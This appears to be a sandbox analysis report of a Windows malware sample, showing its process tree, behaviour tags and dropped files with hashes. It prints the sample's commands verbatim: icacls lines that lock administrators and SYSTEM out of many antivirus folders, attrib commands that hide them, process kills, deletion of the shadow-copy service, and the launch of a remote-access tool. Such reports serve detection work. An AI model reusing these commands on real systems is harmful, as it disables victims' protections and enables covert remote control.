            icacls C:\Programdata\script.exe /deny System:(F)
            Modifies file permissions
            PID:5668
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny Администраторы:(F)
          PID:4768
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\programdata\Malwarebytes /deny Администраторы:(F)
            Modifies file permissions
            PID:5396
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
          PID:4460
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\programdata\Malwarebytes /deny System:(F)
            PID:5220
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny Администраторы:(F)
          PID:5568
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\MB3Install /deny Администраторы:(F)
            Modifies file permissions
            PID:5140
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
          PID:4888
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\MB3Install /deny System:(F)
            PID:5560
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny Администраторы:(F)
          PID:5364
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\olly.exe /deny Администраторы:(F)
            PID:4876
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny System:(F)
          PID:4792
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\olly.exe /deny System:(F)
            PID:6124
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)
          PID:5244
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)
            PID:5960
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny System:(F)
          PID:4628
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\lsass2.exe /deny System:(F)
            Modifies file permissions
            PID:3824
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny Администраторы:(F)
          PID:5312
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\boy.exe /deny Администраторы:(F)
            PID:5184
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny System:(F)
          PID:5008
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\boy.exe /deny System:(F)
            Modifies file permissions
            PID:1312
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)
          PID:2100
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)
            PID:4300
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
          PID:4724
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
            PID:504
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)
          PID:4640
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5544
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
          PID:4560
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
            PID:5764
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
          PID:5012
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:2860
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)
          PID:5888
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)
            PID:5740
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
          PID:5928
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5832
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
          PID:5424
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:2356
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)
          PID:4388
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)
            PID:5280
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
          PID:5640
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
            PID:2276
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
          PID:4488
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:2176
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)
          PID:6032
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5148
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)
          PID:5732
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)
            PID:4412
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
          PID:5372
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5188
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)
          PID:6012
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)
            PID:4764
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)
          PID:4384
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:4336
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)
          PID:5124
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5796
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)
          PID:4432
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)
            PID:4972
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)
          PID:3584
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:1560
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)
          PID:4956
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5520
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)
          PID:4436
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5736
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
          PID:5776
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5588
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
          PID:5392
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
            PID:5828
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)
          PID:5536
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:6064
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
          PID:5444
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:6024
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
          PID:4500
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5576
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
          PID:5452
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
            PID:4392
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
          PID:6132
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
            PID:4292
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
          PID:5540
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
            PID:4712
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)
          PID:4408
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:1704
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)
          PID:4964
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)
            PID:2668
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)
          PID:816
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5260
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)
          PID:5516
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)
            PID:3152
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)
          PID:5292
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)
            PID:1456
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)
          PID:4880
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5720
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)
          PID:5300
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)
            PID:4696
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)
          PID:6000
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)
            PID:5772
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
          PID:4936
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
            PID:5416
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)
          PID:4372
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)
            PID:5844
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
          PID:5436
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:744
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)
          PID:4228
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5572
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
          Drops file in Drivers directory
          PID:5900
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
          PID:6044
          • C:\Windows\SysWOW64\timeout.exe
            TIMEOUT /T 5 /NOBREAK
            Delays execution with timeout.exe
            PID:1120
          • C:\Windows\SysWOW64\timeout.exe
            TIMEOUT /T 3 /NOBREAK
            Delays execution with timeout.exe
            PID:5248
          • C:\Windows\SysWOW64\taskkill.exe
            TASKKILL /IM 1.exe /T /F
            Kills process with taskkill
            PID:5240
          • C:\Windows\SysWOW64\taskkill.exe
            TASKKILL /IM P.exe /T /F
            Kills process with taskkill
            PID:5060
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows
            Views/modifies file attributes
            PID:5992
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Intel\BLOCK.bat
          PID:3156
          • C:\Windows\SysWOW64\taskkill.exe
            TASKKILL /IM iediagcmd.exe /T /F
            Kills process with taskkill
            PID:1504
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\windows\speechstracing" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5976
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\windows\speechstracing" /deny system:(OI)(CI)(F)
            PID:4916
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\program files\Internet Explorer\bin" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:400
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\program files\Internet Explorer\bin" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:4516
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Program Files\360\Total Security"
            Drops file in Program Files directory
            Views/modifies file attributes
            PID:4164
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\360\Total Security" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:5468
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\ProgramData\360TotalSecurity
            Views/modifies file attributes
            PID:3540
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\ProgramData\360safe
            Views/modifies file attributes
            PID:4008
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\360TotalSecurity" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5628
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\360safe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:4100
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\ProgramData\Avira
            Views/modifies file attributes
            PID:5972
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Avira" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5152
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Package Cache"
            Views/modifies file attributes
            PID:6068
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Package Cache" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5932
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Program Files\ESET"
            Drops file in Program Files directory
            Views/modifies file attributes
            PID:5440
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:2864
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\ProgramData\ESET
            Views/modifies file attributes
            PID:5644
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5472
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Program Files\AVAST Software\Avast"
            Drops file in Program Files directory
            Views/modifies file attributes
            PID:5204
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\AVAST Software\Avast" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:1164
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Programdata\AVAST Software"
            Views/modifies file attributes
            PID:5360
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\AVAST Software" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:6104
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Programdata\Kaspersky Lab"
            Views/modifies file attributes
            PID:5448
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Programdata\Kaspersky Lab Setup Files"
            Views/modifies file attributes
            PID:5648
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Kaspersky Lab" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:6072
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:4612
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\AdwCleaner"
            Views/modifies file attributes
            PID:5368
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\AdwCleaner" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:1616
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Program Files\Malwarebytes\Anti-Malware"
            Drops file in Program Files directory
            Views/modifies file attributes
            PID:4160
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Malwarebytes\Anti-Malware" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5492
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "c:\programdata\Malwarebytes"
            Views/modifies file attributes
            PID:1816
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\programdata\Malwarebytes" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:4112
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Programdata\MB3Install"
            Views/modifies file attributes
            PID:6028
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\MB3Install" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:204
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\KVRT_Data"
            Views/modifies file attributes
            PID:2404
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\KVRT_Data" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:4996
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Norton"
            Views/modifies file attributes
            PID:5164
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Norton" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:4324
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Avg"
            Views/modifies file attributes
            PID:3792
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Avg" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5924
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\grizzly"
            Views/modifies file attributes
            PID:5548
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\grizzly" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5200
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Doctor Web"
            Views/modifies file attributes
            PID:4276
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Doctor Web" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5744
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Indus"
            Views/modifies file attributes
            PID:5696
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Indus" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:3220
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\WINDOWS\McMwt"
            Drops file in Windows directory
            Views/modifies file attributes
            PID:5284
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\McMwt" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:4604
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\McMwt" /deny System:(OI)(CI)(F)
            PID:5504
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\lsass2.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:4464
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\lsass2.exe" /deny System:(OI)(CI)(F)
            PID:4444
          • C:\Windows\SysWOW64\timeout.exe
            timeout 1
            Delays execution with timeout.exe
            PID:5728
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\lsass.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:4004
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\lsass.exe" /deny System:(OI)(CI)(F)
            PID:4216
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\windows\boy.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:2192
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\windows\boy.exe" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:5528
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Microsoft\Intel"
            Views/modifies file attributes
            PID:4968
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Microsoft\Check"
            Views/modifies file attributes
            PID:5304
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Microsoft\Temp"
            Views/modifies file attributes
            PID:5784
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete swprv
      PID:2544
      • C:\Windows\SysWOW64\sc.exe
        sc delete swprv
        PID:812
  • C:\ProgramData\Windows\rutserv.exe
    C:\ProgramData\Windows\rutserv.exe
    Executes dropped EXE
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of SetWindowsHookEx
    Suspicious use of WriteProcessMemory
    PID:420
    • C:\ProgramData\Windows\rfusclient.exe
      C:\ProgramData\Windows\rfusclient.exe /tray
      Executes dropped EXE
      PID:760
    • C:\ProgramData\Windows\rfusclient.exe
      C:\ProgramData\Windows\rfusclient.exe
      Executes dropped EXE
      PID:2928
      • C:\ProgramData\Windows\rfusclient.exe
        C:\ProgramData\Windows\rfusclient.exe /tray
        Executes dropped EXE
        Suspicious behavior: SetClipboardViewer
        PID:3464
  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    PID:2080
  • \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k networkservice -s TermService
    PID:4424
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
    Loads dropped DLL
    PID:5460

Network

MITRE ATT&CK Matrix

Downloads

  • C:\Program Files\Common Files\System\iediagcmd.exe
  • C:\Program Files\Common Files\System\iexplore.exe
  • C:\ProgramData\Microsoft\Intel\BLOCK.bat
  • C:\ProgramData\Microsoft\Intel\R8.exe
  • C:\ProgramData\Microsoft\Intel\taskhost.exe
  • C:\ProgramData\Microsoft\Intel\wini.exe
  • C:\ProgramData\RealtekHD\taskhostw.exe
  • C:\ProgramData\WindowsTask\winlogon.exe
    MD5: ec0f9398d8017767f86a4d0e74225506
    SHA1: 720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36
    SHA256: 870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375
    SHA512: d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484
  • C:\ProgramData\Windows\install.vbs
  • C:\ProgramData\Windows\reg1.reg
  • C:\ProgramData\Windows\reg2.reg
  • C:\ProgramData\Windows\rfusclient.exe
    MD5: b8667a1e84567fcf7821bcefb6a444af
    SHA1: 9c1f91fe77ad357c8f81205d65c9067a270d61f0
    SHA256: dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
